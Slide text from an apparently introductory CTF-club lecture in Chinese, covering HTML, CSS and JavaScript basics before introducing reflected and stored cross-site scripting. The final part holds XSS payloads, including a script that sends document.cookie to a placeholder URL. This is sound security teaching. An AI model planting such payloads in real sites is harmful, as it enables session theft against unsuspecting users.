講師:堇姬 @ Izcc-ctf
2023.11.17
成電二年級/幽夜工作室繪師/台灣好厲駭學員
DC : naup_sumire_hime
IG : ckcsc36th_naup
涉獵C++、C、python、遊戲(tkinter、pygame)、資安(Web、Crypto)、AI、flask、html/css/js、 PHP、DC bot。
喜歡看輕小說、動畫、Vtuber、打音遊,也喜歡看百合,就是一個長年混跡ACG的宅女。
夢想是可以成為很電的駭客跟繪師,也想自己寫出一個AI老婆。
你看到的這些就是前端頁面
F12可以查看前端代碼
<!DOCTYPE html> ->聲明類型為html文件
<html>
<head>
包括各種基本資料、聲明、引入連結
</head>
<body>
網頁主體
</body>
</html>
<h1> Furina is so cute</h1>
<h2> Furina is so cute</h2>
<h3> Furina is so cute</h3>
<h4> Furina is so cute</h4>
<h5> Furina is so cute</h5>
<h6> Furina is so cute</h6>
h1最大、h6最小
<p>123</p>
<br>
<a href="https://linktr.ee/naupjjin">Naup</a>
<img src="mywife_Furina.jpg">
<!-- \Furina/\Furina/\Furina/ -->
h1 { color: #333333; }
#title { text-align: center; }
.text-green { color: #32b16c; }
<div hidden>This is a hidden element.</div>
<input type="text" id="username" name="username" required>
let 變數名稱
console.log()
const 常數名稱=資料
prompt("輸入一個數字","預設值")
if(){
}
else if(){
}
else{
}
while(){
}
for(初始;判斷;執行){
}
for(let n=0;n<5;n++){
console.log(n);
}
let n=0;
while(n<5){
console.log(n);
n++;
}
跳出迴圈
跳出迴圈
進到下一圈
let n=0;
while(n<3){
n++;
if(n==1){
break;
}
console.log(n);
}
let n=0;
while(n<3){
n++;
if(n==1){
continue;
}
console.log(n);
}
function 函式名稱(參數名稱列表){
函式內部的程式區塊
}
function f(n1,n2){
let sum=n1+n2
return sum;
}
let aaaa=f(3,4);
console.log(aaaa);
跨站腳本攻擊 (Cross-Site Scripting)
將惡意程式會藏在網址列裡,放在 GET 參數傳遞
http://www.example.com/upload.asp?id=<script>alert(1);</script>
<img src=# onerror=”alert(123)”>
將 Javascript 儲存在伺服器的資料庫中
將 Javascript 注入留言板,當下一位 User 瀏覽網頁時,網頁會載入留言板的 Javascript
<script>alert(1);</script>
<script>
var flag = document.cookie;
fetch("{url}?cookie="+flag)
</script>